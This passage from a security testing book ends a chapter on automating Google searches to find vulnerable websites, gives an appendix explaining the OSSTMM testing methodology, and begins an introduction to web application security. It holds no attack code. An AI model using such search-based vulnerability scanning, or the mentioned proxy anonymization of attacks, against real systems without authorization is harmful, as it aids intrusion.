☑ In a relatively short amount of time, Google has become synonymous with Internet searching. Learning to search Google's online database with its advanced flags is the key to successful Web surfing.
☑ Advanced searching permits users, and more specifically automated programs, to filter and limit the results to a much narrower set of Web pages.
☑ A Google Advanced Search Page documents most of the detailed searching capabilities of Google's database to include country, language, and image searching.

Understanding the Google API

☑ The Google API is designed for application developers looking to automate the collection of Google information in a sanctioned manner.
☑ A complete manual on the Google development API can be found at www.google.com/apis/.
☑ The Google API requires a Google API key that limits an automated engine to sending fewer than 1000 queries per day.

Understanding Google Attack Libraries

☑ Google attack libraries are broken into three main components: socket initialization and establishment, Google query requesting, and retrieving a Google query response.
☑ The Python language proved the most useful and efficient for creating Automated Google Query code. Its OOP style, easily accessible regular expression engine, and indexing methods made it easy to create, send, retrieve, and scrape Google information.
☑ The C# for Microsoft .NET library is the most extendable language implementation of our Google libraries because it can be merged into any program that's compatible with Microsoft's Visual Studio .NET.

Scanning the Web with Google Attack Libraries

☑ Conducting Google vulnerability scans is one of the easiest tasks that's hit the information security industry in the past few years. The key to automating such a task is the looping constructs that wrap around the library implementations presented in this chapter.
☑ You can implement looping constructs to automate searching and information retrieval for numerous purposes.
☑ Nearly all vulnerability scans utilize the allinurl: advanced searching flag to search for strings stored within the Google cache.

Links to Sites

■ ApplicationDefense.com An excellent source of information on application hacking and defense mechanisms. This site also contains the Google Attack Libraries discussed in this chapter.
■ Foundstone.com Home of the Google SiteDigger.
■ www.sensepost.com Home of the Wikto tool.
■ www.cirt.net Home of Sullo and the NIKTO Web Vulnerability database and NIKTO Web Scanning Tools.
■ www.blakewatts.com

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: Can you automate Google analysis in languages that do not contain socket-class functionality?
A: No. Unfortunately, the initial part of any Google-based data analysis is retrieving such data. The socket, or network, functionality is required to connect to Google's databases to send queries and receive responses. That said, it should be understood that an external program could pass Google data to another program for analysis.

Q: Does the Google API interfere with our page-scraping mechanisms?
A: No. The Google API was created to assist developers looking to access information ascertained from Google's search engine. Though Google does not condone automation outside the use of the API, page scraping is completely acceptable, as long as the page is retrieved via a browser. Scraping and API-based techniques can certainly coexist depending on the requirements of your project.

Q: What language is best to use for Google page scraping?
A: It completely depends on the nature of the program you're creating. If you are looking to create an application that sends numerous Google queries and conducts some sort of algorithmic computation on the back end, you'd benefit from a faster language such as C/C++ or C#, with C# being our new favorite. However, if you're looking for a quick alternative that integrates in Web scripts, Perl is the obvious choice for ease of development and time to integration. Java is the de facto cross-platform language of choice, but something prevents us from saying that VBA is a good choice for anything.

Q: Do any of the available freeware tools currently use these libraries?
A: Not in their entirety. However, some of the Perl code has been utilized to update GooScan. All the code provided in this book, on ApplicationDefense, and at Ihackstuff is freely available to use and distribute as long as proper attribution is provided.

Q: Is HTTP 1.0 versus HTTP 1.1 a major decision when considering what protocol to use to transmit the queries?
A: Yes. HTTP 1.1 is much more efficient for transmitting multiple sequences of packets to a Web server. In this case, the libraries are not taking advantage of the HTTP 1.1 protocol, thereby making the decision trivial.

Q: Can any of this code be leveraged to proxy anonymous attacks through Google?
A: Outside of the socket code, nothing could be utilized to proxy attacks. A paper was released in 2001 on making Web attacks anonymous through open Web proxies. We encourage you to search for the paper via Google if you're seeking to gain experience.

Appendix A

Professional Security Testing

by Pete Herzog

Solutions in this Chapter:

■ Professional Security Testing
■ The Open Source Security Testing Methodology Manual (OSSTMM)

☑ Summary
☑ Solutions Fast Track
☑ Frequently Asked Questions

Introduction

Sometimes you win. Sometimes you lose. Sometimes it's all about the game.

Security testing is all about the game. Without trying to borrow too much from sports, it's really about being in the zone. It's when the data reveals itself to you smoother than silk on silk; all systems roll out in front of you like that all-inviting red carpet, and while you stroll down the line, doors pop open everywhere you look. As you glide into the final stretch, you look back and all the weaknesses of the entire security presence are lit before you, perfectly structured in a pattern like the lights of an office tower after dark.

Sometimes though, it's like being stuck in a Dr. Seuss book with all sorts of bizarre characters, roads that fold back on themselves, and doors floating in the sky that go underground. The path becomes a labyrinth, and your way is easily lost as all your tools begin to fail. You follow the westward descent of the sun only to find that upon turning around, all that was visible is now blocked by your own shadow.

It's all about the game. Hide and go seek is one of those games we play because it's fun with its elements of surprise and stealth.
As you get older, the game becomes a balance of speed and escape for most players and much less about actually hiding. Can I hide well enough that someone else will get caught before I am found? Who else has seen me use this hiding space so it's no longer good when it's that kid's turn? Can I hide close enough to the base that I can get safe before I get tagged? Can I position myself in a lesser hiding place but where I have more than one escape route? Of course, little of that is consciously decided. The kid picks the position that most reflects his or her ability compared to the person who is seeking. Those who choose wrong are caught. Those who choose right go free. Then everyone re-evaluates possible hiding places after each round. Meanwhile, the seeker has to analyze all the possible strategy changes simultaneously. Each time a kid seeks, he or she realizes that experience for that game counts very little. Each hider will most likely take new strategies and the ones who don't, won't, because they cannot be caught anyway. The game continues. Security testing is that game where the tester is the seeker. Each round brings more data, even if the data is false or empty from no response. The tester must make a decision each round whether to keep going with that direction or pick a new strategy. Each hider that can be caught must be caught. Those who have excellent strategies are noted in case later we realize that the elapsing of time has www. syngress.com Professional Security Testing • Appendix A 419 eroded that particular strategy. The strategies are based on the operating systems, the network architecture, the available services, the business processes, and even the people. The game is played out until everyone is caught or until time runs out. Just like in real-life hide and go seek, there is no quitting while you are still the seeker. But unlike the real hide and go seek, being a bad seeker can have drastic consequences. 
If a security tester does a poor job, it could mean the client loses money and the tester bears the liability. It can also mean, as in the case of security testing high-frequency microcontrollers in motor vehicles, that people die and the tester is then held liable.

So it's no wonder that security testers have a love for search engines like Google. To us, the security testers, Google can be the source of facts that have spilled onto its ever-growing cache in the moment it takes us to blink. Facts do not require that the information be true, only that the fact is there and that it came from a particular place at a particular time. Google is also composed of the knowledge, experience, and stupid mistakes of thousands of other security professionals that we can compare our own work to. It's an up-to-the-minute reference library that doesn't exist yet in any other form. Unlike a mailing list or forum, it answers our questions because of how and when we ask them. It doesn't judge us as to why we asked them. Therefore, our fragile egos won't be bruised or shattered.

Professional Security Testing

It is true that hacking, in the security sense, is an art. The current services in penetration testing and ethical hacking require skills of intuition and creativity. Most often, the decisions made and avenues followed in hacking are instinctual and follow a simple methodology that provides great freedom. Like any art form, whether a thing of beauty or a message, the creation is a combination of the hacker and the effort. But this is not professional security testing.

Performing security testing in a professional manner is to be a researcher and a detective. While there may be some art to it, the amount of intuition or experience you have is indirectly proportional to the valid results you achieve. While a great hacker may also be a great security tester, the primary skill set of the security tester is the same as that of any researcher: knowledge and persistence.
Valid results, which must be verified and understood, are the holy grail of a security test. Hacking, just as in any art, is about the final creation. In the end, it doesn't matter what you did to create that art, just that you did it and it's impressive. Security testing is about being sure of everything you did to reach the end result and understanding why you did it. You need to understand the conclusions you have reached and find as much evidence as necessary to support those conclusions. The final results may or may not be impressive, but either way they don't require an artist to create them. They require a methodology.

The Open Methodology

In December of 2001, Google searches for a security testing methodology, a penetration testing methodology, or an ethical hacking methodology all brought back the same phrase. Regardless of the Web site, the phrase looked something like this:

"...The best possible test using our in-house, proprietary methodology for security testing..."

This phrase, while deceptively boilerplate, indicated a devastating flaw in the art of the security test. In-house proprietary methodology loosely translates to "we did it our way, and we can't tell you what that way is; it's proprietary."

For this reason, the Open Source Security Testing Methodology Manual (OSSTMM) concept took off. Hundreds of people contributed to the project, injecting both criticism and encouragement. Every piece of feedback made it better. Eventually, as the only publicly available methodology that tested security from the bottom up (as opposed to the policy down), it received the attention of government agencies and militaries around the world. It also scored success with little security start-ups who wanted a public source for client assurance of their security testing services.
Now, the OSSTMM seal, as seen in Figure A.1, is the standard for security testing reports, accepted internationally by almost all government auditing organizations.

Figure A.1 The Generic OSSTMM Seal

The OSSTMM had been housed under the domain ideahamster.org, where it received a steady amount of traffic from contributors dubbed ideahamsters, a nickname for people who were constantly churning out new ideas like a hamster on a wheel. However, as the OSSTMM grew in popularity, the organization and its name were pressured to grow up as well. In November of 2002, ideahamster announced the name change to ISECOM, which stood for the Institute for Security and Open Methodologies. By January 2003, ISECOM had been registered as a non-profit organization in Spain and the United States. Now it officially belonged to the people. And the users of the OSSTMM had a responsibility to give back to it or else it would cease to exist.

As the OSSTMM continues to grow, it has never lost its vendor-free, industry-agnostic, politically clean values. The methodology has continued to provide straight, factual tests for factual answers. It includes information for project planning, quantifying results, and the rules of engagement for those who will perform the security tests. As an academic document, it's a flop. It is full of grammatical errors, the English shifts between British and American spelling styles, and the format is unacceptable for almost every university graduate program. However, the goal of the document is not academic. It is simply there to be used. The OSSTMM has no intentions of being a textbook. As a methodology, you cannot learn from it how or why something should be tested. What you can do is incorporate it into your testing needs, harmonize it with existing laws and policies, and use it as the framework it is to assure a thorough security test through all channels to information or physical property, as seen in Figure A.2, a map of the security presence.

Figure A.2 Map of the Security Presence with All Channels for Access to Information and Physical Property

The security presence is the area for which security can influence your property regardless of your ability to influence or practice security therein. For example, consider protecting your ice cream shop from theft. There are many ways an attacker can cut the electricity going to your store. While that isn't stealing your merchandise, it adversely affects your product line (your ice cream melts) and therefore reduces your income. Is the electrical grid within your security presence? Yes. Can you directly control it? No. You have to rely on service-level agreements from the power company and buy your own generator to handle brownouts and blackouts. Electricity is considered part of physical security, which is just one channel of five that make up your security presence. It gets even more complicated as technology prompts channels to cross. The five channels are described in Table A.1.

Table A.1 The Security Presence Channel Descriptions

Channel | Description
Personnel | Comprises the human element of interaction where people are the gatekeepers of information and physical property.
Physical | Comprises the non-human tangible element of security where interaction requires a physical effort to manipulate it.
Telecommunications | Comprises telecommunication networks, digital or analog, where interaction takes place over established network lines without human assistance.
Wireless Communications | Comprises all non-human interaction that takes place over the known communication spectrum, from the lowest frequencies to the highest.
Data Networks | Comprises all data networks where interaction takes place over established network lines without human assistance.

Understanding the extent of a security presence and the concept of security channels requires a certain amount of research. Oftentimes, the depth of this research is dictated by the amount of time allocated, which reflects on cost or price. Even the smallest amount of time wasted, whether through inefficiency or inability, can have drastic consequences, as in the case of securing a Red Cross barracks on battle-heavy soil, where wasted time means people die. While today's standard penetration tester doesn't have that worry, don't assume that future security testing won't carry such stakes. This all points to the need for a standardized methodology for security testing.

The Standardized Methodology

In the plainest terms, a methodology is a structure. Think recipes from a cookbook. The methodology is the difference between a cake and just a big mess of ingredients. While there are many different types of security methodologies, there is only one that's universally accepted for security testing and the quantification of metrics.

The OSSTMM is a standardized methodology for a thorough verification and measurement of the current operational security state. That's actually a lot of academic-type talk for saying that the OSSTMM will aid you in performing a security test according to a recipe that not only allows you to run the best possible test you can generate in the most efficient way (saving time saves money), but also gives you numbers that realistically represent your current level of security. Actually, the OSSTMM will define and quantify three types of security within the chosen scope.
This is an important concept because the scope may not be the same as the security presence. You can think of the scope as the working space for a project from the vantage point of where you will do the work. If your project is to test a company network, then the scope may be all systems from the vantage point of the internal network. Or the scope may be all the systems which are Web servers. However, both scopes are subsets of the security presence that makes up the entire environment in which those two chosen scopes reside. Once you have defined a scope, the security tests and metrics are constrained to that scope and the assets within that scope. Obviously, this, like statistics, can help you see only what you want to see. It is like the old joke in which a lady sees a man looking for his car keys at night under the street lamp. When she asks him what he's doing, he tells her he's looking for the keys he lost on the way to his car. She asks if this is where he thinks he most likely lost them, and he answers, "No, but this is where the light is."

Of the three types of security quantifiable through the OSSTMM, the first type, which we define as Operational Security, is actually the lack of security you must have to be interactive, useful, public, and open. Think of any store. It has doors, sometimes windows, a lack of clocks on the walls, conveniently spaced aisles that encourage you to walk down them, and a door with a sign telling you that the store happens to be open. Why? Because it generates business having you there. The store needs to be insecure enough for you to walk in the front door so you can pick up items and put them in your basket. For that store to even exist it needs to have people come in and leave money. Before any other security requirements are considered, the store needs to be in operation.
Operational Security is measured by calculating the following parameters during a security test:

■ Visibility For the scope you have defined, how many of the gateways to the assets (in fact, the gateways themselves may be assets), whether they are computers, people, windows, or telephones, can be determined to exist from the perspective of the test? In the example of the store, from outside the store how many employees can I determine to be inside the store with certainty? I want to know this because whatever is inside I may try to interact with (or attack or manipulate or circumvent...). Perhaps I can even determine through interaction which employee is carrying the keys to the registers.
■ Trust For the same scope, how many of the gateways to the assets allow for non-authenticated interaction either between each other or with the outside? In a small store, the employees will authenticate each other continuously just because they recognize each other's faces. In a large company, how do you know who is a fellow employee? By their badge? It's the same with computers. Does the Web server move data to the database server without ever having to authenticate itself?
■ Access For that same scope, how many actual areas are there where I can get interaction through a gateway? This is different from visibility, where we are determining the number of gateways that are there. In visibility, you only count each gateway once regardless of how many different ways we can know it's there and regardless of whether it interacts. Where in visibility I may count that big, iron back door because it is a door that could lead into the store, I would only count it under access if I could get someone or something to interact with me when I knock on it. Additionally, I count all the different action/interaction scenarios with that door. If I knock and someone tells me to go away, that counts as one interaction. If I pick the lock and the door interacts with me by swinging open, then I count that as a second type of interaction, with the easily picked lock also classified and counted again in the second type of security.

The second type is defined as Actual Security. This type takes into consideration that operations require a lack of security, and that anything which is open, trusted, or interactive beyond what is necessary is a problem. Consider a movie theater. While doors must be open to have customers come in, a back door with a badly designed lock that people can easily pick to sneak in is not necessary for business. It's actually anti-operations, since too much sneaking in will inevitably lead to the end of operations. So, beyond what must be open, a security test has to tell us what is just not working in the current state of security. The following five classifications of Actual Security are called security limitations:

■ Vulnerability This is defined as a perceived flaw within a mechanism that allows for privileged access to assets. By "privileged" we mean that you can do something with them or to them. A vulnerability may be a metal in a gate which becomes brittle below 0° C, a thumb-print reader which will grant access without a real thumb, a mail server that lets you send SPAM to anyone you want, or even that employee who wedges the back door open all day to conveniently slip out for smoking breaks.
■ Weakness A weakness is any misconfiguration, survivability fault, usability fault, or failure to meet stated security requirements whether they are law or just policy.
A weakness may be a process which does not save transaction data for the legal time limit as established by regional laws, a fire door alarm which does not sound if the door is left open for a given amount of time, or a firewall which allows enumeration of internal systems using specially crafted TCP packets.
■ Exposure This is defined as a perceived flaw within a mechanism that allows for unprivileged access to sensitive information concerning data, business processes, people, or infrastructure. It's generally used to gain privileged access or even just further knowledge of the operational security state. An exposure may be a lock with the combination available through audible signs of change within the lock's mechanisms, a router providing SNMP information about the target network, a spreadsheet of executive salaries for a private company, or a Web site with the next review date of an organization's elevators. Exposures are often called "information leaks."
■ Concern This is any security uncertainty for which a visible gateway or interactive access point provides neither privileged nor unprivileged access and has no clear business justification. This can include everything from a secretary who gives out the direct phone number of certain executives who never answer their own phone anyway to the system administrator whose online resume discloses the skills learned during their current job but contains no specific system, network, or personnel information. Just the ability to see the papers on an employee's desk through the window will be a concern, even if the papers do not currently disclose information or increase access capabilities.
■ Anomaly Any unidentifiable or unknown element that is a response to the tester's stimulus but that has no known impact on security. This is data that tends to make no sense and serves no purpose as far as the tester can tell.
It is reported solely because it is a response which can be triggered and may be a sign of deeper problems that are inaccessible to the tester. An anomaly might be an unexpected response, possibly from a router in a network, that may indicate network problems. An unnatural radio frequency emanating from an area within the secure perimeter, however, offers no identification or information; the same is true for a phone which rings three times and then whistles. Additionally, it is up to the tester to be certain the anomalies come from the source in question and not from misuse of the tester's own tools.

Furthermore, these classifications are divided between verified and identified security limitations. It is the responsibility of the security analyst to verify all security claims reported. However, not all claims can be, or should be, directly verified. For example, an analyst may determine that a company with a single ISP and a single router is vulnerable to a drastic Denial of Service if that router is taken offline. This is categorized as an identified weakness. To escalate it to a verified weakness, the tester would have to actually attack the router in a way that would prevent service for the rest of the network. The difference between verified and identified in the security test is about a level of factual certainty. However, the loss of business that this Denial of Service would cause the company is far greater than the liability the security tester would incur for reporting this falsely. Therefore, the security analyst can be confident that reporting this single point of failure without the added certainty of actually causing a Denial of Service is acceptable and preferable to the alternative.

The final type of security the OSSTMM defines is loss controls. This is actually defined as ten practices that prevent loss as opposed to performing security.
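The counting rules for Operational Security and the verified/identified split for security limitations, both described above, can be pictured with a small tally. What follows is only a sketch under stated assumptions: the `ScopeTally` class, its method names, and the way the store example is recorded are hypothetical illustrations, not a format defined by the OSSTMM.

```python
from collections import Counter
from dataclasses import dataclass, field

# The five security limitation classes named in the text.
LIMITATIONS = {"vulnerability", "weakness", "exposure", "concern", "anomaly"}


@dataclass
class ScopeTally:
    """Hypothetical record of one scope's results (not an OSSTMM format)."""
    visible: set = field(default_factory=set)       # gateways known to exist
    trusting: set = field(default_factory=set)      # gateways allowing unauthenticated interaction
    interactions: set = field(default_factory=set)  # (gateway, scenario) pairs
    limitations: Counter = field(default_factory=Counter)

    def saw(self, gateway):
        # Visibility: a gateway counts once, however many ways it was detected.
        self.visible.add(gateway)

    def trusts(self, gateway):
        # Trust: the gateway interacts without authenticating the other side.
        self.saw(gateway)
        self.trusting.add(gateway)

    def interacted(self, gateway, scenario):
        # Access: every distinct action/interaction scenario counts separately.
        self.saw(gateway)
        self.interactions.add((gateway, scenario))

    def limitation(self, kind, verified):
        # Limitations are tallied per class and per certainty level.
        if kind not in LIMITATIONS:
            raise ValueError(f"unknown limitation class: {kind}")
        self.limitations[(kind, "verified" if verified else "identified")] += 1

    def operational_security(self):
        return {
            "visibility": len(self.visible),
            "trust": len(self.trusting),
            "access": len(self.interactions),
        }


# The store's back door: noticed twice, knocked on once, lock picked once.
store = ScopeTally()
store.saw("back door")
store.saw("back door")
store.interacted("back door", "knock answered")
store.interacted("back door", "lock picked")
# Assumption: the picked lock is recorded here as a verified vulnerability.
store.limitation("vulnerability", verified=True)
# The single-router case from the text: reported as identified, never attacked.
store.limitation("weakness", verified=False)
print(store.operational_security())
```

Sets are used for the operational counts so that a gateway seen twice is still counted once, while each distinct interaction with it adds to the access count.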
While some of these may appear to be security to most of you, keep in mind that they don't actually prevent interaction with, or visibility of, access gateways. The purpose of loss controls is to assure that assets, such as data or even the access gateways themselves, are protected in the case of theft, failure, or any other type of loss. While you may recognize all of these loss controls and consider some of them weak or worthless on their own, few perfectly controlled systems apply all of them. The main reason for loss controls at all is to protect your investment in your business and the interests of those you want to do business with.

Consider setting up shop to take credit cards. Neither Visa nor MasterCard is interested in how many robbers break in through your flimsy doors or poorly constructed Web site and steal your assets. They just better not be able to steal theirs. So Visa, for example, applies a security audit to assure that even if your production server walks out the door, that list of customer credit card numbers on it defies loss. It should take the attacker more resources and time to get those assets from Visa than they are worth. We've all seen the movie where the bank robbers have a really hard time breaking into the main vault only to find that their techniques burned up all the cash inside. Those are loss controls. And they're classified in the following manner:

■ Authentication What are the requirements (or barriers, to those without authentication) to enter through the gateway? If I ask you for your passport before allowing you to proceed to your gate, I am authenticating you.
■ Non-repudiation What exists to prevent the assumed source from denying its role in any interactivity regardless of whether entry was obtained?
If I can back up an e-mail sent from your computer with time-locked videotape of you sitting at that computer composing the mail, then I am producing non-repudiation of you and your actions.
■ Confidentiality Is the information or physical property displayed or exchanged between two parties known only to those two parties? If I see you exchange a closed, plain-paper package with a colleague, who views the contents of the package without revealing them to you, that interaction occurred with a high degree of confidentiality.
■ Privacy Is the way that information or physical property is displayed or exchanged known only between two parties? If I know that you're going to present your friend with birthday balloons and you enter into your friend's home with the balloons and I can't see or follow the interaction process to know if your friend is happy with the balloons or indifferent, then you interacted privately.
■ Indemnification Is the gateway as an asset or the information or physical property protected publicly by law or privately by insurance? If you hit my car, I may be able to legally demand money for repairs from you. If I can't find you or make you pay, then my insurance will cover the damage and perhaps pay for a rental car so I don't lose productivity while waiting for repairs.
■ Integrity Can the information or physical property be changed or exchanged without all parties involved with the assets being aware of the change? If you swap out my regular, brewed coffee with an instant one made of freeze-dried flakes, both of us would need to be aware of the exchange for me to say that I have strong integrity with my coffee.
■ Safety Will the security processes or mechanisms fail, but the protection provided does not fail?
If you cut power to a bank in order to break the electromagnetic conduction holding the lock in place on the vault, which in turn forces the lock to drop a wedge making the door impossible to open until power is returned, then we can say the lock failed safely.
■ Usability Where protection is interactive with the accessing party, do decisions of the protection process require the action of the accessing party? For you to send a confidential e-mail to me, you need to use encryption. By default, the mail is not confidential and constantly requires you to remember to encrypt the e-mail. For this reason, we can say that your e-mail fails the usability test for security.
■ Continuity Can interaction with, or through, the gateway halt interactions or deny intended interaction upon failure of the gateway? As a store manager on the day before Christmas, if you fail to open up a few extra registers with experienced employees, your checkout service may be quickly overrun to the point where people will decide not to wait in line. You will lose business and therefore we would say that you had no business continuity.
■ Alarm If any of your operational security measures or loss controls fail or are circumvented, will you be informed? During a routine check of your web server log files, you notice a lot of traffic going to a particular internet-based client. It appears malware has somehow infiltrated this web server and has been able to open up a connection to another computer through your firewall. This routine log check has been a successful alarm.

Connecting the Dots

The OSSTMM methodology has a solid base which may seem quite involved but is actually easy in practice. As you can see in Figure A.3, it's just like a flowchart. But it's not. The flow is more integrated and while the beginning and the end are clear, the path is defined by the tester, and the time is allotted to the test.
This is because no methodology can accurately assume the business justification for channels that have been provided. More directly, the OSSTMM doesn't assume best practice. Best practice, or common criteria, or whatever it's being called these days, is only best for some. Business dictates how services should be offered and those services dictate the requirements for operational security, not the other way around. Therefore, a methodology that is different for each test and each tester is exactly what is required for thorough testing.

Figure A.3 Security Testing Methodology 3.0 from the OSSTMM

The OSSTMM begins with a posture review and ends with log verification. This is a full-circle concept where the first step is to be aware of the legalities and operational requirements of those that operate and interact with the scope, which then ends with reviewing the records our tests have left behind. In simpler terms: you know what you need to do, you do it, and then you check what you have done. The "doing" part itself, however, gets fairly involved, as can be seen in Table A.2.

Table A.2 The Security Presence Channel Descriptions

OSSTMM Module | Description | Role of the Search Engine
Posture Review | A thorough review of the legalities and operation requirements of operations interacting with the scope. | Determining applicable laws and legal jurisdictions, locations of primary clientele, business requirements by industry regulation, financial obligations, or ethical requirements.
Logistics | Reviewing distance, speed, and fallibility (yours and theirs) to recognize failure possibilities in the results. | Researching the location, environment, and culture.
Intrusion Detection Verification | Verifying the practice and breadth of intrusion detection. | Researching the organization and their known customers through success stories and marketing, or through partnerships of firms supplying monitoring or intrusion detection mechanisms.
Visibility Audit | Determining the applicable gateways within the scope. | Investigating references to the scope or parts of the security presence.
Controls Verification | Measuring the use and effectiveness of loss controls. | Researching discovered security mechanisms for the maximum depth and coverage possible.
Access Verification | Measuring the breadth and depth of interactive access points within the scope. | Investigating references to the scope or parts of the security presence.
Process Verification | Determining the existence of security processes and measuring these processes for effectiveness. | Researching discovered security mechanisms for related security processes, management requirements, or service-level agreements.
Configuration Verification | Determining the proper configuration of access controls and applications. | Researching discovered security mechanisms for the depth and coverage possible through suggested configuration.
Property Validation | Measuring the breadth and depth of the use of illegal and unlicensed intellectual property or applications within the scope. | Investigating to find the real or true information and information owners.
Segregation Review | A gap analysis between privacy requirements by law, by right, and by actual practice. | Investigating regional privacy laws and requirements.
Exposure Verification | Uncovering information that provides for, or leads to, authenticated access or that allows for access to multiple locations with the same authentication. | Discovering exposed information leaked publicly.
Competitive Intelligence Scouting | Uncovering intelligence that could harm or adversely affect the scope through external, competitive means. | Investigating known competitors, similarities to current practices, and leads for exposed information leaked publicly.
Containment Measures Testing | Determining and measuring the effective use of quarantine for all access to the scope. | Investigating quarantine methods as well as potential hazards that can be tested in the existing quarantine.
Privileges Audit | Mapping and measuring the impact of misuse of privileges or unauthorized privilege escalation. | Translating scope information into ideas for creating false identification, false authentication, and privilege escalation.
Survivability Validation | Determining and measuring the resistance of the scope to excessive or adverse changes. | Investigating known environmental instabilities and common threats of Denial of Service to and from the scope.
Alert and Log Review | A gap analysis between activities performed with the test and the true depth of those activities as recorded, or from third-party perceptions. | Investigating outside performance and increasing the comparison scope of the gap analysis to other industries or countries.

A proper security test may be a methodical flow, but it's far from being a singular flow from start to finish. As testing continues, the tester will often have new information requiring verification in other test modules and this will continue to occur until the test expires.
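The non-linear flow just described, where findings in one module send the tester back into others until time runs out, can be sketched as a simple work queue. This is only an illustration under stated assumptions: the module names come from Table A.2, but the `run_modules` function, the `FOLLOW_UPS` mapping, and the use of a round count to stand in for the allotted time are hypothetical and not part of the OSSTMM.

```python
from collections import deque


def run_modules(start, follow_ups, rounds):
    """Work through test modules until nothing is pending or time runs out.

    follow_ups maps a module to the modules its findings send the tester to;
    rounds stands in for the time allotted to the test.
    """
    pending = deque([start])
    order = []
    while pending and rounds > 0:
        module = pending.popleft()
        order.append(module)          # "perform" the module
        rounds -= 1                   # each module consumes part of the budget
        pending.extend(follow_ups.get(module, []))
    return order


# Hypothetical follow-ups for one imagined test: access findings reveal new
# gateways, which sends the tester back to the visibility audit.
FOLLOW_UPS = {
    "Posture Review": ["Visibility Audit"],
    "Visibility Audit": ["Access Verification"],
    "Access Verification": ["Visibility Audit"],
}

order = run_modules("Posture Review", FOLLOW_UPS, rounds=5)
print(order)
```

In this sketch the same module can appear more than once in the resulting order, and the loop stops only when the budget is spent or no module has anything left to verify, which mirrors the idea that the test continues until it expires.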
As stated in the OSSTMM's Rules of Thumb, the permission to perform verification tests should never be scheduled to end prior to the delivery of the report. And it is the delivery of the report, a written, verifi- able document, which marks the difierence between professional security testing and just playing around. www. syngress.com Appendix A • Professional Security Testing Summary Professional security testing requires a methodology. The methodology most often used is the Open Source Security Testing Methodology Manual from ISECOM, which appHes the volunteer efforts of thousands of people interna- tionally. This manual provides results in three aspects: as operational security, a metric which determines the amount of security required for operations; loss con- trols, a metric for determining the amount of loss prevention in security mecha- nisms; and actual security, the current state of operational security and loss control effectiveness. These three aspects are the result of practicing the methodology itself, a combination of five possible channels as gateways to intellectual or phys- ical property within the security presence, categorized as the telecommunications, wire- less communications, data networks, personnel, and physical channels. Links to Sites 0 www.isecom.org is the main site for the non-profit organization, ISECOM, maintaining the OSSTMM and many other projects. 0 www.osstmm.org is the primary Hnk to the OSSTMM itself and all translations. Mailing Lists 0 ISECOM Discussion is the primary list available for OSSTMM help, feedback, and volunteering efforts. 0 ISECOM News is a low-traffic list for providing project release and update information as well as information about ISECOM events. www. 
Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: Who uses the OSSTMM?
A: Since the OSSTMM is freely available to all for download, ISECOM has no way to know all those who apply it or require tests based on it. By the time of this printing, however, it will have been downloaded approximately two million times.

Q: How does the OSSTMM compare with other security methodologies such as BS 7799 or OCTAVE?
A: OSSTMM is a low-level, bottom-up verification of the policy information audited by higher-level methodologies like those mentioned. OSSTMM is completely compatible with them and will enhance any risk assessment or management methodology by providing a basis of fact on security effectiveness.

Q: Are there other penetration testing methodologies besides the OSSTMM?
A: First, OSSTMM is not a penetration testing methodology. Pen testing, as it's known, is a subset of a security test that often just pits an "ethical hacker" or "pen tester" against a challenge within a particular time frame. Relatively little is actually achieved other than attempts to reach the stated goal, and it is more often a test of the tester than one of the scope. OSSTMM goes far beyond data networks alone to provide a thorough security test that includes valid metrics and a complete report of the effectiveness of all security mechanisms in operation. This also leads to the answer that there is nothing else out there like the OSSTMM. At least not yet.

Q: Is it required to test all channels to do an OSSTMM certified security test?
A: No, only one channel needs to be thoroughly tested.

Q: I have ideas to improve the OSSTMM. How can I help?
A: The best place to share ideas is the ISECOM Discuss list. Most OSSTMM developers are on that list. You can also write the author directly.

Q: The OSSTMM is fairly involved. Where else can I find help with it?
A: Check the ISECOM Web site for seminars, help guides, core team members from your region, and the official OSSTMM certification classes.

Appendix B
An Introduction to Web Application Security
by Matt Fisher

Solutions in this Chapter:
■ Defining Web Application Security
■ The Uniqueness of Web Application Security
■ Web Application Vulnerabilities
■ Constraints of Search Engine Hacking
■ Information and Vulnerabilities in Content
■ Playing with Packets
■ Code Vulnerabilities in Web Applications
■ References
■ Summary
■ Solutions Fast Track
■ Frequently Asked Questions

Introduction

There is no doubt that the advent of the Internet (more specifically, the World Wide Web) has sparked a revolution in how we share information as families, businesses, and world citizens. Perhaps the most important technological invention since the printing press, this one single communication medium holds tomes of information on practically any subject, although that itself is its largest weakness. There are now over 54 million sites on the Web,¹ and search engines are critical to users for finding valuable information on these sites. Simple Nomad first documented search engine hacking in late 1997 and published a series of papers on how to use his favorite search engine of the time (AltaVista). Although the search engines used have changed, using them to find vulnerabilities in Web sites is still a novel approach, for "Google crawls all": both the good and the bad.
If you can form a query for a particular vulnerability, the chances are that Google can find it. With a little understanding of Web application security, however, you will realize that vulnerabilities in sites go beyond even what can be discovered with a search engine. In this appendix we discuss the basics of these vulnerabilities.

Defining Web Application Security

Web application security (a term often abbreviated to Web app sec) deals with the overall architecture, logic, coding, and content of the Web application. In other words, Web application security isn't about operating system vulnerabilities or the security defects in your commercial products; it's about the vulnerabilities in your own software. As such, it isn't a replacement for existing security practices but rather complements them. Hopefully, after reading this chapter you'll have a clear understanding of some Web application vulnerabilities and how the discipline of Web application security is clearly differentiated from what most people typically consider as Web site security. It can help to understand Web app sec by first understanding what it isn't, since the terms Web and application are used broadly in various areas of Internet security. Web application security is not about the following:

■ Trojans or viruses: Firewall manufacturers that have learned how to deal with these often describe their products as providing "application security." Although these products do indeed deal with issues at an application level, they're simply talking about the application level of the OSI stack, not your Web application. The difference is quite distinct in reality, although it has been heavily blurred in the marketing.
There are very few actual Web application firewalls on the market, and they are all quite specialized devices; if the same firewall vendor you've been using for years claims to have an application firewall, dig into the details and ensure that the vendor is actually talking about Web application security and not malware and other application-level attacks.
■ Dealing with spam: That's a whole different can of worms (the worms, of course, being the spammers). It's true that spam occurs at the application layer, but again we're talking about something completely different. The focus of Web application security is not protecting your end users from something traveling over the network; it's about protecting your Web site from being hacked.
■ Web filtering: This area is really more concerned with watching outbound Web traffic to make sure an employee isn't surfing his fantasy football league site at work.
